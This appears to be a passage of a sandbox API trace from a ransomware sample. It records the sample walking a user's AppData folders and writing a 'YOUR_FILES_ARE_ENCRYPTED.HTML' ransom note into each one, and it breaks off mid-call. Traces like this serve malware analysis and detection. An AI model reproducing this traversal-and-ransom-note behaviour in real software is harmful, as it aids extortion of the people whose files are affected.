ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Explorer (2).lnk", cAlternateFileName="WINDOW~3.LNK")) returned 1 [0165.290] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk") returned 125 [0165.290] lstrcmpW (lpString1="Windows Explorer (2).lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.290] PathFindExtensionW (pszPath="Windows Explorer (2).lnk") returned=".lnk" [0165.290] lstrlenW (lpString=".lnk") returned 4 [0165.290] PathFindExtensionW (pszPath="Windows Explorer (2).lnk") returned=".lnk" [0165.290] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd34e2948, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~2.LNK")) returned 1 [0165.290] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 121 [0165.290] lstrcmpW (lpString1="Windows Explorer.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.291] PathFindExtensionW (pszPath="Windows Explorer.lnk") returned=".lnk" [0165.291] lstrlenW (lpString=".lnk") returned 4 [0165.291] PathFindExtensionW (pszPath="Windows Explorer.lnk") returned=".lnk" [0165.291] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd64b9fd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd64b9fd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4c08c29, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x5eb, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Media Player (2).lnk", cAlternateFileName="WINDOW~4.LNK")) returned 1 [0165.291] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk") returned 129 [0165.291] lstrcmpW (lpString1="Windows Media Player (2).lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.291] PathFindExtensionW (pszPath="Windows Media Player (2).lnk") returned=".lnk" [0165.291] lstrlenW (lpString=".lnk") returned 4 [0165.291] PathFindExtensionW (pszPath="Windows Media Player (2).lnk") returned=".lnk" [0165.291] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8942d555, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x5eb, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0165.291] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 125 [0165.291] lstrcmpW (lpString1="Windows Media Player.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.291] PathFindExtensionW (pszPath="Windows Media Player.lnk") returned=".lnk" [0165.291] lstrlenW (lpString=".lnk") returned 4 [0165.291] PathFindExtensionW (pszPath="Windows Media Player.lnk") returned=".lnk" [0165.291] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa36d44f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa36d44f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x9b9b0010, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x94c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Word 2016.lnk", cAlternateFileName="WORD20~1.LNK")) returned 1 [0165.291] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Word 2016.lnk") returned 114 [0165.291] lstrcmpW (lpString1="Word 2016.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.292] PathFindExtensionW (pszPath="Word 2016.lnk") returned=".lnk" [0165.292] lstrlenW (lpString=".lnk") returned 4 [0165.292] PathFindExtensionW (pszPath="Word 2016.lnk") returned=".lnk" [0165.292] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa36d44f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa36d44f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x9b9b0010, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x94c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Word 2016.lnk", cAlternateFileName="WORD20~1.LNK")) returned 0 [0165.292] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0165.292] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0165.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0165.295] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcee4, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcee4*=0x3c00, lpOverlapped=0x0) returned 1 [0165.298] CloseHandle (hObject=0x58c) returned 1 [0165.300] GetProcessHeap () returned 0x270000 [0165.301] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.301] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xa36d44f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa36d44f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="TaskBar", cAlternateFileName="")) returned 0 [0165.301] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0165.301] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0165.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0165.305] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0165.307] CloseHandle (hObject=0x5b8) returned 1 [0165.308] GetProcessHeap () returned 0x270000 [0165.309] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0165.309] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd3743f4d, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x60, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0165.309] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 100 [0165.309] lstrcmpW (lpString1="Window Switcher.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.309] PathFindExtensionW (pszPath="Window Switcher.lnk") returned=".lnk" [0165.309] lstrlenW (lpString=".lnk") returned 4 [0165.309] PathFindExtensionW (pszPath="Window Switcher.lnk") returned=".lnk" [0165.309] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd3743f4d, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x60, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0165.309] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.309] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0165.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.310] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.313] CloseHandle (hObject=0x304) returned 1 [0165.313] GetProcessHeap () returned 0x270000 [0165.314] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.319] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaab38e80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaab38e80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 0 [0165.319] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.319] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0165.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\internet explorer\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.320] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.322] CloseHandle (hObject=0x5e4) returned 1 [0165.323] GetProcessHeap () returned 0x270000 [0165.324] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.325] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0165.325] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network") returned 57 [0165.325] GetProcessHeap () returned 0x270000 [0165.325] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.325] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network" [0165.325] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\*" [0165.325] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.328] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.329] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0165.329] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned 69 [0165.329] GetProcessHeap () returned 0x270000 [0165.329] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0165.331] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0165.331] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*" [0165.331] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.331] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.331] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Pbk", cAlternateFileName="")) returned 1 [0165.331] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned 73 [0165.332] GetProcessHeap () returned 0x270000 [0165.332] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0165.332] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0165.332] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*" [0165.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0165.333] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.333] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 1 [0165.333] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned 84 [0165.333] GetProcessHeap () returned 0x270000 [0165.333] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0165.336] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0165.336] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*" [0165.336] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0165.336] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.336] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="rasphone.pbk", cAlternateFileName="")) returned 1 [0165.336] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 97 [0165.336] lstrcmpW 